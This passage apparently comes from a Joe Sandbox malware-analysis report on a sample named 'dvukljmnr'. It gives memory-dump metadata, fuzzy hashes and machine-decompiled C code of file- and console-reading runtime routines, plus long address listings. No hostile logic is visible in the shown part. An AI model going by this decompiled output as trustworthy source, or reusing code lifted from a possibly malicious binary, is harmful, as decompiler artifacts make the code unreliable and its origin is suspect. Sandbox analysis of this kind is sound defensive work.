                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: %%%u$]:%u
                                                          • API String ID: 48624451-3050659472
                                                          • Opcode ID: 51a8652c59c22a7516413e0fb304eab5a58354704f8ea3c2f54e70480d0afc98
                                                          • Instruction ID: efdad50921c4c877daf2fb7c32043ae97c7b81124c2e442e3c97a1f6eb79cfab
                                                          • Opcode Fuzzy Hash: 51a8652c59c22a7516413e0fb304eab5a58354704f8ea3c2f54e70480d0afc98
                                                          • Instruction Fuzzy Hash: 2721A576900219ABCF20DF54DD45AEFB3BCBB90700F544555FC5AD3141EB70AA988BE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 69%
                                                          			E009AE4CA(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                                          				char* _v8;
                                                          				signed int _v12;
                                                          				signed int _v16;
                                                          				signed int _v20;
                                                          				void* __ebx;
                                                          				void* __esi;
                                                          				signed int _t74;
                                                          				signed int _t78;
                                                          				char _t81;
                                                          				signed int _t86;
                                                          				signed int _t88;
                                                          				signed int _t91;
                                                          				signed int _t94;
                                                          				signed int _t97;
                                                          				signed int _t98;
                                                          				char* _t99;
                                                          				signed int _t100;
                                                          				signed int _t102;
                                                          				signed int _t103;
                                                          				signed int _t104;
                                                          				char* _t110;
                                                          				signed int _t113;
                                                          				signed int _t117;
                                                          				signed int _t119;
                                                          				void* _t120;
                                                          
                                                          				_t99 = _a4;
                                                          				_t74 = _a8;
                                                          				_v8 = _t99;
                                                          				_v12 = _t74;
                                                          				if(_a12 == 0) {
                                                          					L5:
                                                          					return 0;
                                                          				}
                                                          				_t97 = _a16;
                                                          				if(_t97 == 0) {
                                                          					goto L5;
                                                          				}
                                                          				if(_t99 != 0) {
                                                          					_t119 = _a20;
                                                          					__eflags = _t119;
                                                          					if(_t119 == 0) {
                                                          						L9:
                                                          						__eflags = _a8 - 0xffffffff;
                                                          						if(_a8 != 0xffffffff) {
                                                          							_t74 = E009AE740(_t99, 0, _a8);
                                                          							_t120 = _t120 + 0xc;
                                                          						}
                                                          						__eflags = _t119;
                                                          						if(_t119 == 0) {
                                                          							goto L3;
                                                          						} else {
                                                          							_t78 = _t74 | 0xffffffff;
                                                          							__eflags = _t97 - _t78 / _a12;
                                                          							if(_t97 > _t78 / _a12) {
                                                          								goto L3;
                                                          							}
                                                          							L13:
                                                          							_t117 = _a12 * _t97;
                                                          							__eflags =  *(_t119 + 0xc) & 0x0000010c;
                                                          							_t98 = _t117;
                                                          							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
                                                          								_t100 = 0x1000;
                                                          							} else {
                                                          								_t100 =  *(_t119 + 0x18);
                                                          							}
                                                          							_v16 = _t100;
                                                          							__eflags = _t117;
                                                          							if(_t117 == 0) {
                                                          								L41:
                                                          								return _a16;
                                                          							} else {
                                                          								do {
                                                          									__eflags =  *(_t119 + 0xc) & 0x0000010c;
                                                          									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
                                                          										L24:
                                                          										__eflags = _t98 - _t100;
                                                          										if(_t98 < _t100) {
                                                          											_t81 = E009AF572(_t98, _t119, _t119);
                                                          											__eflags = _t81 - 0xffffffff;
                                                          											if(_t81 == 0xffffffff) {
                                                          												L46:
                                                          												return (_t117 - _t98) / _a12;
                                                          											}
                                                          											_t102 = _v12;
                                                          											__eflags = _t102;
                                                          											if(_t102 == 0) {
                                                          												L42:
                                                          												__eflags = _a8 - 0xffffffff;
                                                          												if(_a8 != 0xffffffff) {
                                                          													E009AE740(_a4, 0, _a8);
                                                          												}
                                                          												 *((intOrPtr*)(E009AF100())) = 0x22;
                                                          												L4:
                                                          												E009AEB1E();
                                                          												goto L5;
                                                          											}
                                                          											_t110 = _v8;
                                                          											 *_t110 = _t81;
                                                          											_t98 = _t98 - 1;
                                                          											_v8 = _t110 + 1;
                                                          											_t103 = _t102 - 1;
                                                          											__eflags = _t103;
                                                          											_v12 = _t103;
                                                          											_t100 =  *(_t119 + 0x18);
                                                          											_v16 = _t100;
                                                          											goto L40;
                                                          										}
                                                          										__eflags = _t100;
                                                          										if(_t100 == 0) {
                                                          											_t86 = 0x7fffffff;
                                                          											__eflags = _t98 - 0x7fffffff;
                                                          											if(_t98 <= 0x7fffffff) {
                                                          												_t86 = _t98;
                                                          											}
                                                          										} else {
                                                          											__eflags = _t98 - 0x7fffffff;
                                                          											if(_t98 <= 0x7fffffff) {
                                                          												_t44 = _t98 % _t100;
                                                          												__eflags = _t44;
                                                          												_t113 = _t44;
                                                          												_t91 = _t98;
                                                          											} else {
                                                          												_t113 = 0x7fffffff % _t100;
                                                          												_t91 = 0x7fffffff;
                                                          											}
                                                          											_t86 = _t91 - _t113;
                                                          										}
                                                          										__eflags = _t86 - _v12;
                                                          										if(_t86 > _v12) {
                                                          											goto L42;
                                                          										} else {
                                                          											_push(_t86);
                                                          											_push(_v8);
                                                          											_push(E009AF693(_t119));
                                                          											_t88 = E009AF84A();
                                                          											_t120 = _t120 + 0xc;
                                                          											__eflags = _t88;
                                                          											if(_t88 == 0) {
                                                          												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
                                                          												goto L46;
                                                          											}
                                                          											__eflags = _t88 - 0xffffffff;
                                                          											if(_t88 == 0xffffffff) {
                                                          												L45:
                                                          												_t64 = _t119 + 0xc;
                                                          												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
                                                          												__eflags =  *_t64;
                                                          												goto L46;
                                                          											}
                                                          											_t98 = _t98 - _t88;
                                                          											__eflags = _t98;
                                                          											L36:
                                                          											_v8 = _v8 + _t88;
                                                          											_v12 = _v12 - _t88;
                                                          											_t100 = _v16;
                                                          											goto L40;
                                                          										}
                                                          									}
                                                          									_t94 =  *(_t119 + 4);
                                                          									_v20 = _t94;
                                                          									__eflags = _t94;
                                                          									if(__eflags == 0) {
                                                          										goto L24;
                                                          									}
                                                          									if(__eflags < 0) {
                                                          										goto L45;
                                                          									}
                                                          									__eflags = _t98 - _t94;
                                                          									if(_t98 < _t94) {
                                                          										_t94 = _t98;
                                                          										_v20 = _t98;
                                                          									}
                                                          									_t104 = _v12;
                                                          									__eflags = _t94 - _t104;
                                                          									if(_t94 > _t104) {
                                                          										goto L42;
                                                          									} else {
                                                          										E009AF6B7(_v8, _t104,  *_t119, _t94);
                                                          										_t88 = _v20;
                                                          										_t120 = _t120 + 0x10;
                                                          										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
                                                          										_t98 = _t98 - _t88;
                                                          										 *_t119 =  *_t119 + _t88;
                                                          										goto L36;
                                                          									}
                                                          									L40:
                                                          									__eflags = _t98;
                                                          								} while (_t98 != 0);
                                                          								goto L41;
                                                          							}
                                                          						}
                                                          					}
                                                          					_t74 = (_t74 | 0xffffffff) / _a12;
                                                          					__eflags = _t97 - _t74;
                                                          					if(_t97 <= _t74) {
                                                          						goto L13;
                                                          					}
                                                          					goto L9;
                                                          				}
                                                          				L3:
                                                          				 *((intOrPtr*)(E009AF100())) = 0x16;
                                                          				goto L4;
                                                          			}
                                                          0x00000000
                                                          0x009ae63e
                                                          0x009ae5b2
                                                          0x009ae5b4
                                                          0x009ae5d8
                                                          0x009ae5dd
                                                          0x009ae5e3
                                                          0x009ae5e5
                                                          0x009ae5e5
                                                          0x009ae5b6
                                                          0x009ae5b8
                                                          0x009ae5be
                                                          0x009ae5d0
                                                          0x009ae5d0
                                                          0x009ae5d0
                                                          0x009ae5d2
                                                          0x009ae5c0
                                                          0x009ae5c5
                                                          0x009ae5c7
                                                          0x009ae5c7
                                                          0x009ae5d4
                                                          0x009ae5d4
                                                          0x009ae5e7
                                                          0x009ae5ea
                                                          0x00000000
                                                          0x009ae5ec
                                                          0x009ae5ec
                                                          0x009ae5ed
                                                          0x009ae5f7
                                                          0x009ae5f8
                                                          0x009ae5fd
                                                          0x009ae600
                                                          0x009ae602
                                                          0x009ae689
                                                          0x00000000
                                                          0x009ae689
                                                          0x009ae608
                                                          0x009ae60b
                                                          0x009ae677
                                                          0x009ae677
                                                          0x009ae677
                                                          0x009ae677
                                                          0x00000000
                                                          0x009ae677
                                                          0x009ae60d
                                                          0x009ae60d
                                                          0x009ae60f
                                                          0x009ae60f
                                                          0x009ae612
                                                          0x009ae615
                                                          0x00000000
                                                          0x009ae615
                                                          0x009ae5ea
                                                          0x009ae56f
                                                          0x009ae572
                                                          0x009ae575
                                                          0x009ae577
                                                          0x00000000
                                                          0x00000000
                                                          0x009ae579
                                                          0x00000000
                                                          0x00000000
                                                          0x009ae57f
                                                          0x009ae581
                                                          0x009ae583
                                                          0x009ae585
                                                          0x009ae585
                                                          0x009ae588
                                                          0x009ae58b
                                                          0x009ae58d
                                                          0x00000000
                                                          0x009ae593
                                                          0x009ae59a
                                                          0x009ae59f
                                                          0x009ae5a2
                                                          0x009ae5a5
                                                          0x009ae5a8
                                                          0x009ae5aa
                                                          0x00000000
                                                          0x009ae5aa
                                                          0x009ae641
                                                          0x009ae641
                                                          0x009ae641
                                                          0x00000000
                                                          0x009ae566
                                                          0x009ae560
                                                          0x009ae532
                                                          0x009ae515
                                                          0x009ae518
                                                          0x009ae51a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x009ae51a
                                                          0x009ae4f0
                                                          0x009ae4f5
                                                          0x00000000

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                          • String ID:
                                                          • API String ID: 1559183368-0
                                                          • Opcode ID: 5fdde417556b5480242da2ac3e102494601d3f47f1c02e04318f7146ed66b739
                                                          • Instruction ID: caf1a86da483b6d82a2ba1a17679e1ed2f350771cc86c9dba7a5160017a99b48
                                                          • Opcode Fuzzy Hash: 5fdde417556b5480242da2ac3e102494601d3f47f1c02e04318f7146ed66b739
                                                          • Instruction Fuzzy Hash: D451B230E00705DBDF249FA9988466EB7A9AF53324F248B29F826962D0E775DD508BD0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 77%
                                                          			E009A28A2(signed int __ebx, signed int __ecx, signed int __esi) {
                                                          				signed char _t247;
                                                          				signed int _t250;
                                                          				signed int _t251;
                                                          				signed int _t252;
                                                          				intOrPtr _t253;
                                                          				void* _t254;
                                                          				void* _t255;
                                                          				signed int _t256;
                                                          				signed int _t258;
                                                          				long _t259;
                                                          				char* _t261;
                                                          				signed char _t265;
                                                          				signed char _t266;
                                                          				signed int _t267;
                                                          				signed int _t268;
                                                          				signed char _t269;
                                                          				signed int _t277;
                                                          				intOrPtr _t278;
                                                          				void* _t280;
                                                          				void* _t281;
                                                          				void* _t282;
                                                          				void* _t283;
                                                          				signed int _t287;
                                                          				void* _t288;
                                                          				signed int _t291;
                                                          				signed int _t292;
                                                          				intOrPtr _t294;
                                                          				void* _t296;
                                                          				signed char _t297;
                                                          				signed int _t298;
                                                          				signed char _t299;
                                                          				signed int _t300;
                                                          				signed int _t302;
                                                          				signed int _t313;
                                                          				char _t314;
                                                          				char _t315;
                                                          				signed int _t317;
                                                          				void* _t318;
                                                          				signed char _t319;
                                                          				signed int _t327;
                                                          				intOrPtr _t328;
                                                          				void* _t330;
                                                          				void* _t331;
                                                          				void* _t332;
                                                          				signed int _t334;
                                                          				signed int _t335;
                                                          				void* _t336;
                                                          				long _t338;
                                                          				void _t346;
                                                          				void _t349;
                                                          				signed int _t355;
                                                          				signed int _t357;
                                                          				char* _t358;
                                                          				signed int _t359;
                                                          				void* _t360;
                                                          				intOrPtr _t362;
                                                          				signed int _t363;
                                                          				signed int _t368;
                                                          				long _t369;
                                                          				void* _t370;
                                                          				intOrPtr _t371;
                                                          				char _t374;
                                                          				signed int _t376;
                                                          				void* _t377;
                                                          				intOrPtr _t378;
                                                          				signed int _t380;
                                                          				void* _t383;
                                                          				intOrPtr _t384;
                                                          				intOrPtr _t387;
                                                          				char _t388;
                                                          				intOrPtr _t389;
                                                          				intOrPtr _t390;
                                                          				signed int _t391;
                                                          				void* _t392;
                                                          				void* _t393;
                                                          				void* _t394;
                                                          				signed int _t396;
                                                          				void _t399;
                                                          				void* _t400;
                                                          				void* _t401;
                                                          				signed int _t403;
                                                          				signed short* _t406;
                                                          				signed int _t407;
                                                          				void* _t410;
                                                          				char* _t412;
                                                          				signed int _t413;
                                                          				signed int _t417;
                                                          				intOrPtr _t418;
                                                          				signed int _t419;
                                                          				signed int _t420;
                                                          				signed int _t421;
                                                          				signed char* _t422;
                                                          				int _t423;
                                                          				signed int _t424;
                                                          				void* _t426;
                                                          				void* _t428;
                                                          
                                                          				_t415 = __esi;
                                                          				_t359 = __ecx;
                                                          				_t355 = __ebx;
                                                          				 *((char*)(_t426 + 0x13)) = 0x8100009a;
                                                          				if(0xffffffff81000099 == 0) {
                                                          					_t247 =  !__esi;
                                                          					__eflags = _t247 & 0x00000001;
                                                          					if((_t247 & 0x00000001) == 0) {
                                                          						goto L2;
                                                          					} else {
                                                          						_t415 = __esi >> 1;
                                                          						__eflags = _t415 - 4;
                                                          						if(_t415 < 4) {
                                                          							_t415 = 4;
                                                          						}
                                                          						_t252 = E009B22C8(_t389, _t415);
                                                          						 *(_t426 - 0x10) = _t252;
                                                          						_pop(_t360);
                                                          						__eflags = _t252;
                                                          						if(__eflags != 0) {
                                                          							_t253 = E009B3F56(_t360, __eflags,  *((intOrPtr*)(_t426 + 8)), 0, 0, 1);
                                                          							_t428 = _t428 + 0x10;
                                                          							_t362 =  *((intOrPtr*)(0x9cf230 +  *(_t426 - 0xc) * 4));
                                                          							 *((intOrPtr*)(_t362 + _t355 + 0x28)) = _t253;
                                                          							_t254 =  *(_t426 - 0x10);
                                                          							 *((intOrPtr*)(_t362 + _t355 + 0x2c)) = _t389;
                                                          							_t359 =  *(_t426 - 0xc);
                                                          							goto L14;
                                                          						} else {
                                                          							 *((intOrPtr*)(E009AF100())) = 0xc;
                                                          							_t250 = E009AF0CC();
                                                          							 *_t250 = 8;
                                                          							goto L162;
                                                          						}
                                                          					}
                                                          				} else {
                                                          					if(0xffffffff81000098 != 0) {
                                                          						L7:
                                                          						_t254 =  *(_t426 + 0xc);
                                                          						 *(_t426 - 0x10) = _t254;
                                                          						L14:
                                                          						_t390 =  *((intOrPtr*)(0x9cf230 + _t359 * 4));
                                                          						_t363 =  *(_t426 - 0xc);
                                                          						 *(_t426 - 0x1c) = _t254;
                                                          						if(( *(_t390 + _t355 + 4) & 0x00000048) != 0) {
                                                          							_t399 =  *((intOrPtr*)(_t390 + _t355 + 5));
                                                          							if(_t399 != 0xa && _t415 != 0) {
                                                          								 *_t254 = _t399;
                                                          								_t29 = _t254 + 1; // 0x9b2b48
                                                          								_t400 = _t29;
                                                          								_t403 = 1;
                                                          								_t415 = _t415 - 1;
                                                          								 *(_t426 - 0x1c) = _t400;
                                                          								 *((char*)( *((intOrPtr*)(0x9cf230 + _t363 * 4)) + _t355 + 5)) = 0xa;
                                                          								if( *((char*)(_t426 + 0x13)) != 0) {
                                                          									_t39 = _t355 + 0x25; // 0x45c60975
                                                          									_t346 =  *((intOrPtr*)( *((intOrPtr*)(0x9cf230 + _t363 * 4)) + _t39));
                                                          									if(_t346 != 0xa && _t415 != 0) {
                                                          										 *_t400 = _t346;
                                                          										_t401 = _t400 + 1;
                                                          										_t415 = _t415 - 1;
                                                          										 *(_t426 - 0x1c) = _t401;
                                                          										_t403 = 2;
                                                          										 *((char*)( *((intOrPtr*)(0x9cf230 + _t363 * 4)) + _t355 + 0x25)) = 0xa;
                                                          										if( *((char*)(_t426 + 0x13)) == 1) {
                                                          											_t349 =  *((intOrPtr*)( *((intOrPtr*)(0x9cf230 + _t363 * 4)) + _t355 + 0x26));
                                                          											if(_t349 != 0xa && _t415 != 0) {
                                                          												 *_t401 = _t349;
                                                          												_t415 = _t415 - 1;
                                                          												_t403 = 3;
                                                          												_t388 = 0xa;
                                                          												 *(_t426 - 0x1c) = _t401 + 1;
                                                          												 *((char*)( *((intOrPtr*)(0x9cf230 + _t363 * 4)) + _t355 + 0x26)) = _t388;
                                                          											}
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          						_t255 = E009B3924( *((intOrPtr*)(_t426 + 8)));
                                                          						_t256 =  *(_t426 - 0xc);
                                                          						if(_t255 == 0) {
                                                          							L35:
                                                          							_t258 = ReadFile( *( *((intOrPtr*)(0x9cf230 + _t256 * 4)) + _t355),  *(_t426 - 0x1c), _t415, _t426 - 0x14, 0);
                                                          							__eflags = _t258;
                                                          							if(_t258 == 0) {
                                                          								L157:
                                                          								_t259 = GetLastError();
                                                          								_t417 = 5;
                                                          								__eflags = _t259 - _t417;
                                                          								if(_t259 != _t417) {
                                                          									__eflags = _t259 - 0x6d;
                                                          									if(_t259 != 0x6d) {
                                                          										goto L30;
                                                          									}
                                                          									_t357 = 0;
                                                          									goto L32;
                                                          								}
                                                          								 *((intOrPtr*)(E009AF100())) = 9;
                                                          								 *(E009AF0CC()) = _t417;
                                                          								goto L31;
                                                          							}
                                                          							_t368 =  *(_t426 - 0x14);
                                                          							__eflags = _t368;
                                                          							if(_t368 < 0) {
                                                          								goto L157;
                                                          							}
                                                          							__eflags = _t368 - _t415;
                                                          							if(_t368 > _t415) {
                                                          								goto L157;
                                                          							}
                                                          							goto L38;
                                                          						} else {
                                                          							_t387 =  *((intOrPtr*)(0x9cf230 + _t256 * 4));
                                                          							if(( *(_t387 + _t355 + 4) & 0x00000080) == 0) {
                                                          								goto L35;
                                                          							}
                                                          							_t338 = GetConsoleMode( *(_t387 + _t355), _t426 - 0x20);
                                                          							 *(_t426 - 0x20) = _t338;
                                                          							if(_t338 == 0 ||  *((char*)(_t426 + 0x13)) != 2) {
                                                          								_t256 =  *(_t426 - 0xc);
                                                          								goto L35;
                                                          							} else {
                                                          								if(ReadConsoleW( *( *((intOrPtr*)(0x9cf230 +  *(_t426 - 0xc) * 4)) + _t355),  *(_t426 - 0x1c), _t415 >> 1, _t426 - 0x14, 0) != 0) {
                                                          									_t368 =  *(_t426 - 0x14) +  *(_t426 - 0x14);
                                                          									 *(_t426 - 0x14) = _t368;
                                                          									L38:
                                                          									_t391 =  *(_t426 - 0xc);
                                                          									_t403 = _t403 + _t368;
                                                          									_t418 =  *((intOrPtr*)(0x9cf230 + _t391 * 4));
                                                          									_t88 = _t355 + 4; // 0x840ffff8
                                                          									_t265 =  *((intOrPtr*)(_t418 + _t88));
                                                          									__eflags = _t265;
                                                          									if(_t265 >= 0) {
                                                          										L98:
                                                          										_t261 =  *(_t426 - 0x10);
                                                          										L99:
                                                          										_t357 =  *(_t426 - 0x18);
                                                          										0x74a7428b();
                                                          										L101:
                                                          										if(_t261 !=  *(_t426 + 0xc)) {
                                                          											E009B2248(_t261);
                                                          										}
                                                          										if(_t357 != 0xfffffffe) {
                                                          											_t403 = _t357;
                                                          										}
                                                          										_t251 = _t403;
                                                          										L163:
                                                          										return _t251;
                                                          									}
                                                          									__eflags =  *((char*)(_t426 + 0x13)) - 2;
                                                          									if( *((char*)(_t426 + 0x13)) == 2) {
                                                          										__eflags =  *(_t426 - 0x20);
                                                          										if( *(_t426 - 0x20) == 0) {
                                                          											__eflags = _t368;
                                                          											if(_t368 == 0) {
                                                          												L124:
                                                          												_t266 = _t265 & 0x000000fb;
                                                          												__eflags = _t266;
                                                          												L125:
                                                          												 *(_t418 + _t355 + 4) = _t266;
                                                          												_t267 =  *(_t426 - 0x10);
                                                          												_t419 = _t267;
                                                          												 *(_t426 - 0x28) = _t267;
                                                          												_t369 = _t267 + _t403;
                                                          												 *(_t426 - 0x20) = _t369;
                                                          												__eflags = _t267 - _t369;
                                                          												if(_t267 >= _t369) {
                                                          													L156:
                                                          													_t261 =  *(_t426 - 0x10);
                                                          													_t403 = _t419 - _t261;
                                                          													goto L99;
                                                          												}
                                                          												_t370 = 0xd;
                                                          												 *((intOrPtr*)(_t426 + 0x10)) = 0x1a;
                                                          												_t406 = _t267;
                                                          												while(1) {
                                                          													_t268 =  *_t406 & 0x0000ffff;
                                                          													__eflags = _t268 -  *((intOrPtr*)(_t426 + 0x10));
                                                          													if(_t268 ==  *((intOrPtr*)(_t426 + 0x10))) {
                                                          														break;
                                                          													}
                                                          													__eflags = _t268 - _t370;
                                                          													if(_t268 == _t370) {
                                                          														__eflags = _t406 -  *(_t426 - 0x20) + 0xfffffffe;
                                                          														if(_t406 >=  *(_t426 - 0x20) + 0xfffffffe) {
                                                          															_t406 =  &(_t406[1]);
                                                          															_t277 = ReadFile( *( *((intOrPtr*)(0x9cf230 + _t391 * 4)) + _t355), _t426 - 8, 2, _t426 - 0x14, 0);
                                                          															__eflags = _t277;
                                                          															if(_t277 != 0) {
                                                          																L137:
                                                          																__eflags =  *(_t426 - 0x14);
                                                          																if( *(_t426 - 0x14) == 0) {
                                                          																	L152:
                                                          																	_t391 =  *(_t426 - 0xc);
                                                          																	_t370 = 0xd;
                                                          																	 *_t419 = _t370;
                                                          																	_t419 = _t419 + 2;
                                                          																	L144:
                                                          																	__eflags = _t406 -  *(_t426 - 0x20);
                                                          																	if(_t406 <  *(_t426 - 0x20)) {
                                                          																		continue;
                                                          																	}
                                                          																	goto L156;
                                                          																}
                                                          																_t391 =  *(_t426 - 0xc);
                                                          																_t278 =  *((intOrPtr*)(0x9cf230 + _t391 * 4));
                                                          																__eflags =  *(_t278 + _t355 + 4) & 0x00000048;
                                                          																if(( *(_t278 + _t355 + 4) & 0x00000048) == 0) {
                                                          																	__eflags = _t419 -  *(_t426 - 0x10);
                                                          																	if(__eflags != 0) {
                                                          																		L149:
                                                          																		E009B3F56(_t370, __eflags,  *((intOrPtr*)(_t426 + 8)), 0xfffffffe, 0xffffffff, 1);
                                                          																		_t391 =  *(_t426 - 0xc);
                                                          																		_t428 = _t428 + 0x10;
                                                          																		_t280 = 0xa;
                                                          																		__eflags =  *(_t426 - 8) - _t280;
                                                          																		if( *(_t426 - 8) == _t280) {
                                                          																			L142:
                                                          																			_push(0xd);
                                                          																			L143:
                                                          																			_pop(_t370);
                                                          																			goto L144;
                                                          																		}
                                                          																		_t370 = 0xd;
                                                          																		 *_t419 = _t370;
                                                          																		L151:
                                                          																		_t419 = _t419 + 2;
                                                          																		goto L144;
                                                          																	}
                                                          																	_t281 = 0xa;
                                                          																	__eflags =  *(_t426 - 8) - _t281;
                                                          																	if(__eflags != 0) {
                                                          																		goto L149;
                                                          																	}
                                                          																	 *_t419 = _t281;
                                                          																	_t419 = _t419 + 2;
                                                          																	goto L142;
                                                          																}
                                                          																_t282 = 0xa;
                                                          																_push(0xd);
                                                          																__eflags =  *(_t426 - 8) - _t282;
                                                          																if( *(_t426 - 8) != _t282) {
                                                          																	_pop(_t283);
                                                          																	 *_t419 = _t283;
                                                          																	_t419 = _t419 + 2;
                                                          																	__eflags = _t419;
                                                          																	 *((char*)( *((intOrPtr*)(0x9cf230 + _t391 * 4)) + _t355 + 5)) =  *(_t426 - 8);
                                                          																	 *((char*)( *((intOrPtr*)(0x9cf230 + _t391 * 4)) + _t355 + 0x25)) =  *((intOrPtr*)(_t426 - 7));
                                                          																	_t374 = 0xa;
                                                          																	 *((char*)( *((intOrPtr*)(0x9cf230 + _t391 * 4)) + _t355 + 0x26)) = _t374;
                                                          																	goto L142;
                                                          																}
                                                          																 *_t419 = _t282;
                                                          																_t419 = _t419 + 2;
                                                          																goto L143;
                                                          															}
                                                          															_t287 = GetLastError();
                                                          															__eflags = _t287;
                                                          															if(_t287 != 0) {
                                                          																goto L152;
                                                          															}
                                                          															goto L137;
                                                          														}
                                                          														_t392 = 0xa;
                                                          														__eflags = _t406[1] - _t392;
                                                          														_t391 =  *(_t426 - 0xc);
                                                          														if(_t406[1] != _t392) {
                                                          															 *_t419 = _t370;
                                                          															L134:
                                                          															_t419 = _t419 + 2;
                                                          															_t406 =  &(_t406[1]);
                                                          															goto L144;
                                                          														}
                                                          														_t288 = 0xa;
                                                          														_t406 =  &(_t406[2]);
                                                          														 *_t419 = _t288;
                                                          														goto L151;
                                                          													}
                                                          													 *_t419 = _t268;
                                                          													goto L134;
                                                          												}
                                                          												_t371 =  *((intOrPtr*)(0x9cf230 + _t391 * 4));
                                                          												_t269 =  *(_t371 + _t355 + 4);
                                                          												__eflags = _t269 & 0x00000040;
                                                          												if((_t269 & 0x00000040) != 0) {
                                                          													 *_t419 =  *_t406;
                                                          													_t419 = _t419 + 2;
                                                          													__eflags = _t419;
                                                          												} else {
                                                          													 *(_t371 + _t355 + 4) = _t269 | 0x00000002;
                                                          												}
                                                          												goto L156;
                                                          											}
                                                          											_t393 = 0xa;
                                                          											__eflags =  *( *(_t426 - 0x10)) - _t393;
                                                          											_t391 =  *(_t426 - 0xc);
                                                          											if( *( *(_t426 - 0x10)) != _t393) {
                                                          												goto L124;
                                                          											}
                                                          											_t266 = _t265 | 0x00000004;
                                                          											goto L125;
                                                          										}
                                                          										_t420 =  *(_t426 - 0x10);
                                                          										asm("cdq");
                                                          										_t407 = _t420;
                                                          										_t376 = _t420;
                                                          										_t291 = _t403 - _t391 >> 1;
                                                          										_t394 = _t407 + _t291 * 2;
                                                          										__eflags = _t407 - _t394;
                                                          										if(_t407 >= _t394) {
                                                          											L120:
                                                          											_t261 =  *(_t426 - 0x10);
                                                          											_t403 = _t420 - _t261 & 0xfffffffe;
                                                          											goto L99;
                                                          										}
                                                          										 *((intOrPtr*)(_t426 + 0x10)) = 0x1a;
                                                          										asm("sbb al, [eax]");
                                                          										 *_t291 =  *_t291 + _t291;
                                                          										__eflags =  *_t291;
                                                          										_t410 = 0xd;
                                                          										while(1) {
                                                          											_t292 =  *_t376 & 0x0000ffff;
                                                          											__eflags = _t292 -  *((intOrPtr*)(_t426 + 0x10));
                                                          											if(_t292 ==  *((intOrPtr*)(_t426 + 0x10))) {
                                                          												break;
                                                          											}
                                                          											__eflags = _t292 - _t410;
                                                          											if(_t292 == _t410) {
                                                          												__eflags = _t376 - _t394 - 2;
                                                          												if(_t376 < _t394 - 2) {
                                                          													_t376 = _t376 + 2;
                                                          													_t296 = 0xa;
                                                          													__eflags =  *_t376 - _t296;
                                                          													if( *_t376 != _t296) {
                                                          														_t296 = 0xd;
                                                          														_t410 = _t296;
                                                          													}
                                                          													 *_t420 = _t296;
                                                          													_t420 = _t420 + 2;
                                                          													__eflags = _t420;
                                                          												}
                                                          											} else {
                                                          												 *_t420 = _t292;
                                                          												_t420 = _t420 + 2;
                                                          												_t376 = _t376 + 2;
                                                          											}
                                                          											__eflags = _t376 - _t394;
                                                          											if(_t376 < _t394) {
                                                          												continue;
                                                          											} else {
                                                          												goto L120;
                                                          											}
                                                          										}
                                                          										_t294 =  *((intOrPtr*)(0x9cf230 +  *(_t426 - 0xc) * 4));
                                                          										_t181 = _t294 + _t355 + 4;
                                                          										 *_t181 =  *(_t294 + _t355 + 4) | 0x00000002;
                                                          										__eflags =  *_t181;
                                                          										goto L120;
                                                          									}
                                                          									__eflags = _t368;
                                                          									if(_t368 == 0) {
                                                          										L43:
                                                          										_t297 = _t265 & 0x000000fb;
                                                          										__eflags = _t297;
                                                          										L44:
                                                          										 *(_t418 + _t355 + 4) = _t297;
                                                          										_t298 =  *(_t426 - 0x10);
                                                          										_t421 = _t298;
                                                          										 *(_t426 - 0x20) = _t298;
                                                          										_t377 = _t298 + _t403;
                                                          										 *(_t426 - 0x1c) = _t377;
                                                          										__eflags = _t298 - _t377;
                                                          										if(_t298 >= _t377) {
                                                          											L75:
                                                          											_t261 =  *(_t426 - 0x10);
                                                          											_t403 = _t421 - _t261;
                                                          											__eflags =  *((char*)(_t426 + 0x13)) - 1;
                                                          											if( *((char*)(_t426 + 0x13)) != 1) {
                                                          												goto L99;
                                                          											}
                                                          											__eflags = _t403;
                                                          											if(_t403 == 0) {
                                                          												goto L99;
                                                          											}
                                                          											_t422 = _t421 - 1;
                                                          											_t299 =  *_t422;
                                                          											__eflags = _t299;
                                                          											if(_t299 < 0) {
                                                          												_t300 = _t299 & 0x000000ff;
                                                          												_t396 = 1;
                                                          												__eflags =  *((char*)(_t300 + 0x9ce408));
                                                          												if( *((char*)(_t300 + 0x9ce408)) != 0) {
                                                          													L85:
